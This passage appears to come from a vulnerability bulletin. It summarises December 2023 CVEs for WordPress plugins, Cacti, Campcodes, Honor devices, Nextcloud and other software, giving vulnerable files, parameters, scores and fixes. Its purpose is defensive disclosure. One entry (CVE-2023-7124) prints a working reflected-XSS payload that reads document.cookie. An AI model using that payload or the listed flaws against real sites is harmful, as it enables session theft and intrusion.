wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in N Squared Appointment Booking Calendar – Simply Schedule Appointments Booking Plugin. This issue affects Appointment Booking Calendar – Simply Schedule Appointments Booking Plugin: from n/a before 1.6.6.1. 2023-12-28 7.6 CVE-2023-50851
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in StylemixThemes Booking Calendar | Appointment Booking | BookIt. This issue affects Booking Calendar | Appointment Booking | BookIt: from n/a through 2.4.3. 2023-12-28 7.6 CVE-2023-50852
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Nasirahmed Advanced Form Integration – Connect WooCommerce and Contact Form 7 to Google Sheets and other platforms. This issue affects Advanced Form Integration – Connect WooCommerce and Contact Form 7 to Google Sheets and other platforms: from n/a through 1.75.0. 2023-12-28 7.6 CVE-2023-50853
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Squirrly Squirrly SEO – Advanced Pack. This issue affects Squirrly SEO – Advanced Pack: from n/a through 2.3.8. 2023-12-28 7.6 CVE-2023-50854
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Sam Perrow Pre* Party Resource Hints. This issue affects Pre* Party Resource Hints: from n/a through 1.8.18. 2023-12-28 7.6 CVE-2023-50855
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in FunnelKit Funnel Builder for WordPress by FunnelKit – Customize WooCommerce Checkout Pages, Create Sales Funnels & Maximize Profits. This issue affects Funnel Builder for WordPress by FunnelKit – Customize WooCommerce Checkout Pages, Create Sales Funnels & Maximize Profits: from n/a through 2.14.3. 2023-12-28 7.6 CVE-2023-50856
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in FunnelKit Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit. This issue affects Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit: from n/a through 2.6.1. 2023-12-28 7.6 CVE-2023-50857
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in CodexThemes TheGem – Creative Multi-Purpose & WooCommerce WordPress Theme allows Reflected XSS. This issue affects TheGem – Creative Multi-Purpose & WooCommerce WordPress Theme: from n/a through 5.9.1. 2023-12-29 7.1 CVE-2023-50892
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in UpSolution Impreza – WordPress Website and WooCommerce Builder allows Reflected XSS. This issue affects Impreza – WordPress Website and WooCommerce Builder: from n/a through 8.17.4. 2023-12-29 7.1 CVE-2023-50893
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in HasThemes HT Mega – Absolute Addons For Elementor allows Reflected XSS. This issue affects HT Mega – Absolute Addons For Elementor: from n/a through 2.3.8. 2023-12-29 7.1 CVE-2023-50901
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Ian Kennerley Google Photos Gallery with Shortcodes allows Reflected XSS. This issue affects Google Photos Gallery with Shortcodes: from n/a through 4.0.2. 2023-12-29 7.1 CVE-2023-51373
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Undsgn Uncode – Creative & WooCommerce WordPress Theme allows Reflected XSS. This issue affects Uncode – Creative & WooCommerce WordPress Theme: from n/a through 2.8.6. 2023-12-28 7.1 CVE-2023-51501
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WS Form WS Form LITE – Drag & Drop Contact Form Builder for WordPress. This issue affects WS Form LITE – Drag & Drop Contact Form Builder for WordPress: from n/a through 1.9.170. 2023-12-29 7.6 CVE-2023-52135
audit@patchstack.com
wordpress — wordpress The Backup Migration plugin for WordPress is vulnerable to OS Command Injection in all versions up to, and including, 1.3.9 via the ‘url’ parameter. This vulnerability allows authenticated attackers, with administrator-level permissions and above, to execute arbitrary commands on the host operating system. 2023-12-23 7.2 CVE-2023-7002
security@wordfence.com
yaztek_software_technologies_and_computer_systems — e-commerce_software Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Yaztek Software Technologies and Computer Systems E-Commerce Software allows SQL Injection. This issue affects E-Commerce Software: through 20231229.  NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-29 9.8 CVE-2023-4674
iletisim@usom.gov.tr


Medium Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
advplyr — audiobookshelf Audiobookshelf is a self-hosted audiobook and podcast server. Prior to 2.7.0, Audiobookshelf is vulnerable to an unauthenticated blind server-side request forgery (SSRF) vulnerability in Auth.js. This vulnerability has been addressed in version 2.7.0. There are no known workarounds for this vulnerability. 2023-12-27 4.3 CVE-2023-51665
security-advisories@github.com
advplyr — audiobookshelf Audiobookshelf is a self-hosted audiobook and podcast server. Prior to 2.7.0, Audiobookshelf is vulnerable to an unauthenticated blind server-side request forgery (SSRF) vulnerability in `podcastUtils.js`. This vulnerability has been addressed in version 2.7.0. There are no known workarounds for this vulnerability. 2023-12-27 4.3 CVE-2023-51697
security-advisories@github.com
aws — aws-sdk-php AWS SDK for PHP is the Amazon Web Services software development kit for PHP. Within the scope of requests to S3 object keys and/or prefixes containing a Unix double-dot, a URI path traversal is possible. The issue exists in the `buildEndpoint` method in the RestSerializer component of the AWS SDK for PHP v3 prior to 3.288.1. The `buildEndpoint` method relies on the Guzzle Psr7 UriResolver utility, which strips dot segments from the request path in accordance with RFC 3986. Under certain conditions, this could lead to an arbitrary object being accessed. This issue has been patched in version 3.288.1. 2023-12-22 6 CVE-2023-51651
security-advisories@github.com
cacti — cacti Cacti is an open source operational monitoring and fault management framework. A reflection cross-site scripting vulnerability was discovered in version 1.2.25. Attackers can exploit this vulnerability to perform actions on behalf of other users. The vulnerability is found in `templates_import.php`. When uploading an XML template file, if the XML file does not pass the check, the server will give a JavaScript pop-up prompt, which contains the unfiltered XML template file name, resulting in XSS. An attacker exploiting this vulnerability could execute actions on behalf of other users. This ability to impersonate users could lead to unauthorized changes to settings. As of time of publication, no patched versions are available. 2023-12-22 6.1 CVE-2023-50250
security-advisories@github.com
cacti — cacti Reflected Cross Site Scripting (XSS) vulnerability in Cacti v1.2.25, allows remote attackers to escalate privileges when uploading an xml template file via templates_import.php. 2023-12-22 6.1 CVE-2023-50569
cve@mitre.org
cacti — cacti Cacti is a robust performance and fault management framework and a frontend to RRDTool – a Time Series Database (TSDB). Bypassing an earlier fix (CVE-2023-39360) that leads to a DOM XSS attack. Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is the `graphs_new.php`. Impact of the vulnerability – execution of arbitrary javascript code in the attacked user’s browser. This issue has been patched in version 1.2.26. 2023-12-22 5.4 CVE-2023-49086
security-advisories@github.com
cacti — cacti Cacti is an open source operational monitoring and fault management framework. The fix applied for CVE-2023-39515 in version 1.2.25 is incomplete as it enables an adversary to have a victim browser execute malicious code when a victim user hovers their mouse over the malicious data source path in `data_debug.php`. To perform the cross-site scripting attack, the adversary needs to be an authorized cacti user with the following permissions: `General Administration>Sites/Devices/Data`. The victim of this attack could be any account with permissions to view `http://<HOST>/cacti/data_debug.php`. As of time of publication, no complete fix has been included in Cacti. 2023-12-22 4.8 CVE-2023-49088
security-advisories@github.com
campcodes — chic_beauty_salon A vulnerability classified as critical was found in Campcodes Chic Beauty Salon 20230703. Affected by this vulnerability is an unknown functionality of the file product-list.php of the component Product Handler. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249157 was assigned to this vulnerability. 2023-12-29 4.7 CVE-2023-7150
cna@vuldb.com
campcodes — online_college_library_system A vulnerability was found in Campcodes Online College Library System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/borrow_add.php of the component HTTP POST Request Handler. The manipulation of the argument student leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249362 is the identifier assigned to this vulnerability. 2023-12-30 4.7 CVE-2023-7175
cna@vuldb.com
campcodes — online_college_library_system A vulnerability classified as critical has been found in Campcodes Online College Library System 1.0. This affects an unknown part of the file /admin/return_add.php of the component HTTP POST Request Handler. The manipulation of the argument student leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249363. 2023-12-30 4.7 CVE-2023-7176
cna@vuldb.com
campcodes — online_college_library_system A vulnerability classified as critical was found in Campcodes Online College Library System 1.0. This vulnerability affects unknown code of the file /admin/book_add.php of the component HTTP POST Request Handler. The manipulation of the argument category leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249364. 2023-12-30 4.7 CVE-2023-7177
cna@vuldb.com
campcodes — online_college_library_system A vulnerability, which was classified as critical, has been found in Campcodes Online College Library System 1.0. This issue affects some unknown processing of the file /admin/book_row.php of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249365 was assigned to this vulnerability. 2023-12-30 4.7 CVE-2023-7178
cna@vuldb.com
campcodes — online_college_library_system A vulnerability, which was classified as critical, was found in Campcodes Online College Library System 1.0. Affected is an unknown function of the file /admin/category_row.php of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249366 is the identifier assigned to this vulnerability. 2023-12-30 4.7 CVE-2023-7179
cna@vuldb.com
campcodes — online_college_library_system A vulnerability was found in Muyun DedeBIZ up to 6.2.12 and classified as critical. Affected by this issue is some unknown functionality of the component Add Attachment Handler. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249368. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-30 4.7 CVE-2023-7181
cna@vuldb.com
cloudflare — wrangler Sending specially crafted HTTP requests and inspector messages to Wrangler’s dev server could result in any file on the user’s computer being accessible over the local network. An attacker that could trick any user on the local network into opening a malicious website could also read any file. 2023-12-29 6.4 CVE-2023-7079
cna@cloudflare.com
code-projects — automated_voting_system A vulnerability classified as critical has been found in code-projects Automated Voting System 1.0. This affects an unknown part of the file /admin/ of the component Admin Login. The manipulation of the argument username leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249129 was assigned to this vulnerability. 2023-12-28 6.3 CVE-2023-7126
cna@vuldb.com
code-projects — automated_voting_system A vulnerability classified as critical was found in code-projects Automated Voting System 1.0. This vulnerability affects unknown code of the component Login. The manipulation of the argument idno leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-249130 is the identifier assigned to this vulnerability. 2023-12-28 6.3 CVE-2023-7127
cna@vuldb.com
code-projects — automated_voting_system A vulnerability, which was classified as critical, has been found in code-projects Voting System 1.0. This issue affects some unknown processing of the file /admin/ of the component Admin Login. The manipulation of the argument username leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249131. 2023-12-28 6.3 CVE-2023-7128
cna@vuldb.com
code-projects — client_details_system A vulnerability, which was classified as critical, has been found in code-projects Client Details System 1.0. Affected by this issue is some unknown functionality of the component HTTP POST Request Handler. The manipulation of the argument uemail leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249140. 2023-12-28 6.3 CVE-2023-7137
cna@vuldb.com
code-projects — client_details_system A vulnerability, which was classified as critical, was found in code-projects Client Details System 1.0. This affects an unknown part of the file /admin of the component HTTP POST Request Handler. The manipulation of the argument username leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249141 was assigned to this vulnerability. 2023-12-28 6.3 CVE-2023-7138
cna@vuldb.com
code-projects — client_details_system A vulnerability has been found in code-projects Client Details System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /admin/regester.php of the component HTTP POST Request Handler. The manipulation of the argument fname/lname/email/contact leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-249142 is the identifier assigned to this vulnerability. 2023-12-28 4.3 CVE-2023-7139
cna@vuldb.com
code-projects — client_details_system A vulnerability was found in code-projects Client Details System 1.0 and classified as problematic. This issue affects some unknown processing of the file /admin/manage-users.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249143. 2023-12-28 4.3 CVE-2023-7140
cna@vuldb.com
code-projects — client_details_system A vulnerability was found in code-projects Client Details System 1.0. It has been classified as problematic. Affected is an unknown function of the file /admin/update-clients.php. The manipulation of the argument uid leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249144. 2023-12-29 4.3 CVE-2023-7141
cna@vuldb.com
code-projects — client_details_system A vulnerability was found in code-projects Client Details System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/clientview.php. The manipulation of the argument ID leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249145 was assigned to this vulnerability. 2023-12-29 4.3 CVE-2023-7142
cna@vuldb.com
code-projects — e-commerce_site A vulnerability, which was classified as problematic, was found in code-projects E-Commerce Site 1.0. Affected is an unknown function of the file search.php. The manipulation of the argument keyword with the input <video/src=x onerror=alert(document.cookie)> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249096. 2023-12-28 4.3 CVE-2023-7124
cna@vuldb.com
code-projects — faculty_management_system A vulnerability, which was classified as problematic, has been found in code-projects Faculty Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/pages/yearlevel.php. The manipulation of the argument Year Level/Section leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248744. 2023-12-22 6.1 CVE-2023-7057
cna@vuldb.com
code-projects — faculty_management_system A vulnerability classified as problematic was found in code-projects Faculty Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/pages/subjects.php. The manipulation of the argument Description/Units leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248743. 2023-12-22 5.4 CVE-2023-7056
cna@vuldb.com
code-projects — intern_membership_management_system A vulnerability was found in code-projects Intern Membership Management System 2.0 and classified as critical. Affected by this issue is some unknown functionality of the file /user_registration/ of the component User Registration. The manipulation of the argument userName leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-249134 is the identifier assigned to this vulnerability. 2023-12-28 6.3 CVE-2023-7131
cna@vuldb.com
code-projects — point_of_sales_and_inventory_management_system A vulnerability was found in code-projects Point of Sales and Inventory Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /main/checkout.php. The manipulation of the argument pt leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248846 is the identifier assigned to this vulnerability. 2023-12-22 6.1 CVE-2023-7075
cna@vuldb.com
code-projects — voting_system A vulnerability, which was classified as critical, was found in code-projects Voting System 1.0. Affected is an unknown function of the component Voters Login. The manipulation of the argument voter leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249132. 2023-12-28 5.5 CVE-2023-7129
cna@vuldb.com
concrete_cms — concrete_cms Concrete CMS 9 before 9.2.3 is vulnerable to Cross Site Request Forgery (CSRF) via /ccm/system/dialogs/logs/delete_all/submit. An attacker can force an admin user to delete server report logs on a web application to which they are currently authenticated. 2023-12-25 4.3 CVE-2023-48652
cve@mitre.org
dell — cpg_bios Dell BIOS contains an Improper Input Validation vulnerability. A local malicious user with high privileges could potentially exploit this vulnerability in order to corrupt memory on the system. 2023-12-22 6.7 CVE-2023-39251
security_alert@emc.com
dfir-iris — iris-web Iris is a web collaborative platform aiming to help incident responders share technical details during investigations. A stored Cross-Site Scripting (XSS) vulnerability has been identified in iris-web, affecting multiple locations in versions prior to v2.3.7. The vulnerability may allow an attacker to inject malicious scripts into the application, which could then be executed when a user visits the affected locations. This could lead to unauthorized access, data theft, or other related malicious activities. An attacker needs to be authenticated on the application to exploit this vulnerability. The issue is fixed in version v2.3.7 of iris-web. No known workarounds are available. 2023-12-22 4.6 CVE-2023-50712
security-advisories@github.com
ffcss — ffcss ffcss is a CLI interface to apply and configure Firefox CSS themes. Prior to 0.2.0, the function `lookupPreprocess()` is meant to apply some transformations to a string by disabling characters in the regex `[-_ .]`. However, due to the use of late Unicode normalization of type NFKD, it is possible to bypass that validation and re-introduce all the characters in the regex `[-_ .]`. The `lookupPreprocess()` can be easily bypassed with equivalent Unicode characters like U+FE4D (﹍), which would result in the omitted U+005F (_), for instance. The `lookupPreprocess()` function is only ever used to search for themes loosely (case insensitively, while ignoring dashes, underscores and dots), so the actual security impact is classified as low. This vulnerability is fixed in 0.2.0. There are no known workarounds. 2023-12-28 5.3 CVE-2023-52081
security-advisories@github.com
gopeak — masterlab A vulnerability classified as critical has been found in gopeak MasterLab up to 3.3.10. This affects the function sqlInject of the file app/ctrl/framework/Feature.php of the component HTTP POST Request Handler. The manipulation of the argument pwd leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249147. 2023-12-29 6.3 CVE-2023-7144
cna@vuldb.com
gopeak — masterlab A vulnerability classified as critical was found in gopeak MasterLab up to 3.3.10. This vulnerability affects the function sqlInject of the file app/ctrl/Framework.php of the component HTTP POST Request Handler. The manipulation of the argument pwd leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249148. 2023-12-29 6.3 CVE-2023-7145
cna@vuldb.com
gopeak — masterlab A vulnerability, which was classified as critical, has been found in gopeak MasterLab up to 3.3.10. This issue affects the function sqlInjectDelete of the file app/ctrl/framework/Feature.php of the component HTTP POST Request Handler. The manipulation of the argument phone leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249149 was assigned to this vulnerability. 2023-12-29 6.3 CVE-2023-7146
cna@vuldb.com
gopeak — masterlab A vulnerability, which was classified as critical, was found in gopeak MasterLab up to 3.3.10. Affected is the function base64ImageContent of the file app/ctrl/User.php. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. VDB-249150 is the identifier assigned to this vulnerability. 2023-12-29 6.3 CVE-2023-7147
cna@vuldb.com
gopeak — masterlab A vulnerability was found in gopeak MasterLab up to 3.3.10. It has been declared as critical. Affected by this vulnerability is the function add/update of the file app/ctrl/admin/User.php. The manipulation of the argument avatar leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249181 was assigned to this vulnerability. 2023-12-29 4.7 CVE-2023-7159
cna@vuldb.com
gradio — gradio Gradio is an open-source Python package that allows you to quickly build a demo or web application for your machine learning model, API, or any arbitrary Python function. Versions of `gradio` prior to 4.11.0 contained a vulnerability in the `/file` route which made them susceptible to file traversal attacks in which an attacker could access arbitrary files on a machine running a Gradio app with a public URL (e.g. if the demo was created with `share=True`, or on Hugging Face Spaces) if they knew the path of files to look for. This issue has been patched in version 4.11.0. 2023-12-22 5.6 CVE-2023-51449
security-advisories@github.com
hail — hail Hail is an open-source, general-purpose, Python-based data analysis tool with additional data types and methods for working with genomic data. Hail relies on OpenID Connect (OIDC) email addresses from ID tokens to verify the validity of a user’s domain, but because users have the ability to change their email address, they could create accounts and use resources in clusters that they should not have access to. For example, a user could create a Microsoft or Google account and then change their email to `test@example.org`. This account can then be used to create a Hail Batch account in Hail Batch clusters whose organization domain is `example.org`. The attacker is not able to access private data or impersonate another user, but they would have the ability to run jobs if Hail Batch billing projects are enabled and create Azure Tenants if they have Azure Active Directory Administrator access. 2023-12-29 5.3 CVE-2023-51663
security-advisories@github.com
hcl_software — hcl_launch An HCL UrbanCode Deploy Agent installed as a Windows service in a non-standard location could be subject to a denial of service attack by local accounts. 2023-12-28 6.2 CVE-2023-45702
psirt@hcl.com
hcl_software — hcl_launch HCL Launch could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. 2023-12-28 4.3 CVE-2023-45701
psirt@hcl.com
honor — fri-an00 Some Honor products are affected by file writing vulnerability, successful exploitation could cause information disclosure. 2023-12-29 6.6 CVE-2023-23426
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — honorboardapp Some Honor products are affected by information leak vulnerability; successful exploitation could cause the information leak. 2023-12-29 4 CVE-2023-23434
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — lge-an00 Some Honor products are affected by incorrect privilege assignment vulnerability; successful exploitation could cause device service exceptions. 2023-12-29 4 CVE-2023-23438
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — lge-an00 Some Honor products are affected by information leak vulnerability; successful exploitation could cause the information leak. 2023-12-29 4 CVE-2023-23439
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_os Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause information leak. 2023-12-29 6 CVE-2023-51429
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_os Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause device service exceptions. 2023-12-29 4 CVE-2023-23427
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_os Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause device service exceptions. 2023-12-29 4 CVE-2023-23429
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_os Some Honor products are affected by type confusion vulnerability; successful exploitation could cause information leak. 2023-12-29 4.6 CVE-2023-23442
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_os Some Honor products are affected by type confusion vulnerability; successful exploitation could cause information leak. 2023-12-29 4.6 CVE-2023-23443
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_os Some Honor products are affected by type confusion vulnerability, successful exploitation could cause information leak. 2023-12-29 4.6 CVE-2023-51426
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_os Some Honor products are affected by type confusion vulnerability, successful exploitation could cause information leak. 2023-12-29 4.6 CVE-2023-51427
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_os Some Honor products are affected by type confusion vulnerability, successful exploitation could cause information leak. 2023-12-29 4.6 CVE-2023-51428
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_os Some Honor products are affected by signature management vulnerability, successful exploitation could cause the forged system file to overwrite the correct system file. 2023-12-29 4 CVE-2023-23435
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_ui Some Honor products are affected by out of bounds read vulnerability, successful exploitation could cause information leak. 2023-12-29 6 CVE-2023-23441
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_ui Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause information leak. 2023-12-29 4.4 CVE-2023-51430
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_ui Some Honor products are affected by type confusion vulnerability, successful exploitation could cause denial of service. 2023-12-29 4 CVE-2023-6939
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — nth-an00 Some Honor products are affected by file writing vulnerability, successful exploitation could cause code execution. 2023-12-29 6.5 CVE-2023-23424
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — nth-an00 Some Honor products are affected by signature management vulnerability, successful exploitation could cause the forged system file to overwrite the correct system file. 2023-12-29 4 CVE-2023-23433
3836d913-7555-4dd0-a509-f5667fdf5fe4
ibm — aix IBM AIX 7.2 and 7.3 could allow a non-privileged local user to exploit a vulnerability in the AIX SMB client to cause a denial of service. IBM X-Force ID: 267963. 2023-12-22 5.5 CVE-2023-45165
psirt@us.ibm.com
instipod — duouniversalkeycloakauthenticator An information disclosure vulnerability exists in the challenge functionality of instipod DuoUniversalKeycloakAuthenticator 1.0.7 plugin. A specially crafted HTTP request can lead to a disclosure of sensitive information. A user login to Keycloak using DuoUniversalKeycloakAuthenticator plugin triggers this vulnerability. 2023-12-23 4.5 CVE-2023-49594
talos-cna@cisco.com
kylinsoft — kylin-system-updater A vulnerability classified as critical has been found in KylinSoft kylin-system-updater up to 2.0.5.16-0k2.33. Affected is an unknown function of the file /usr/share/kylin-system-updater/SystemUpdater/UpgradeStrategiesDbus.py of the component com.kylin.systemupgrade Service. The manipulation of the argument SetDownloadspeedMax leads to os command injection. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248940. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-25 5.3 CVE-2023-7093
cna@vuldb.com
mediawiki — mediawiki An issue was discovered in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. In includes/logging/RightsLogFormatter.php, group-*-member messages can result in XSS on Special:log/rights. 2023-12-22 6.1 CVE-2023-51704
cve@mitre.org
metersphere — metersphere MeterSphere is a one-stop open source continuous testing platform. Prior to 2.10.10-lts, authenticated attackers can update resources which don’t belong to them if the resource ID is known. This issue is fixed in 2.10.10-lts. There are no known workarounds. 2023-12-28 4.3 CVE-2023-50267
security-advisories@github.com
micropython — micropython A vulnerability, which was classified as critical, has been found in MicroPython 1.21.0/1.22.0-preview. Affected by this issue is the function poll_set_add_fd of the file extmod/modselect.c. The manipulation leads to use after free. The exploit has been disclosed to the public and may be used. The patch is identified as 8b24aa36ba978eafc6114b6798b47b7bfecdca26. It is recommended to apply a patch to fix this issue. VDB-249158 is the identifier assigned to this vulnerability. 2023-12-29 5.5 CVE-2023-7152
cna@vuldb.com
moxa — iologik_e1200 A weak cryptographic algorithm vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. This vulnerability can help an attacker compromise the confidentiality of sensitive data. This vulnerability may lead an attacker to get unexpected authorization. 2023-12-23 6.5 CVE-2023-5962
psirt@moxa.com
msgpackr — msgpackr msgpackr is a fast MessagePack NodeJS/JavaScript implementation. Prior to 1.10.1, when decoding user supplied MessagePack messages, users can trigger stuck threads by crafting messages that keep the decoder stuck in a loop. The fix is available in v1.10.1. Exploits seem to require structured cloning; replacing the 0x70 extension with your own (that throws an error or does something other than recursive referencing) should mitigate the issue. 2023-12-28 6.8 CVE-2023-52079
security-advisories@github.com
netentsec — ns-asg_application_security_gateway A vulnerability classified as problematic was found in Netentsec NS-ASG Application Security Gateway 6.3. Affected by this vulnerability is an unknown functionality of the file /protocol/nsasg6.0.tgz. The manipulation leads to information disclosure. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248941 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-25 5.3 CVE-2023-7094
cna@vuldb.com
nextcloud — nextcloud The Nextcloud iOS Files app allows users of iOS to interact with Nextcloud, a self-hosted productivity platform. Prior to version 4.9.2, the application can be used without providing the 4-digit PIN code. Nextcloud iOS Files app should be upgraded to 4.9.2 to receive the patch. No known workarounds are available. 2023-12-22 4.3 CVE-2023-49790
security-advisories@github.com
nextcloud — server/enterprise_server Nextcloud Server provides data storage for Nextcloud, an open source cloud platform. In Nextcloud Server prior to versions 26.0.9 and 27.1.4; as well as Nextcloud Enterprise Server prior to versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4; when an attacker manages to get access to an active session of another user via another way, they could delete and modify workflows by sending calls directly to the API bypassing the password confirmation shown in the UI. Nextcloud Server versions 26.0.9 and 27.1.4 and Nextcloud Enterprise Server versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4 contain a patch for this issue. No known workarounds are available. 2023-12-22 5.4 CVE-2023-49791
security-advisories@github.com
nextcloud — server/enterprise_server Nextcloud Server provides data storage for Nextcloud, an open source cloud platform. In Nextcloud Server prior to versions 26.0.9 and 27.1.4; as well as Nextcloud Enterprise Server prior to versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4; when a (reverse) proxy is configured as trusted proxy the server could be tricked into reading a wrong remote address for an attacker, allowing them to execute more authentication attempts than intended. Nextcloud Server versions 26.0.9 and 27.1.4 and Nextcloud Enterprise Server versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4 contain a patch for this issue. No known workarounds are available. 2023-12-22 5.3 CVE-2023-49792
security-advisories@github.com
own_health_record — own_health_record A vulnerability was found in MdAlAmin-aol Own Health Record 0.1-alpha/0.2-alpha/0.3-alpha/0.3.1-alpha. It has been rated as problematic. This issue affects some unknown processing of the file includes/logout.php. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. Upgrading to version 0.4-alpha is able to address this issue. The patch is named 58b413aa40820b49070782c786c526850ab7748f. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-249191. 2023-12-30 4.3 CVE-2018-25096
cna@vuldb.com
pandora_fms — pandora_fms Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Pandora FMS on all allows Cross-Site Scripting (XSS). It was possible to execute malicious JS code on Visual Consoles. This issue affects Pandora FMS: from 700 through 774. 2023-12-29 6.1 CVE-2023-44089
security@pandorafms.com
pandora_fms — pandora_fms Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Pandora FMS on all allows SQL Injection. Arbitrary SQL queries were allowed to be executed using any account with low privileges. This issue affects Pandora FMS: from 700 through 774. 2023-12-29 5.9 CVE-2023-44088
security@pandorafms.com
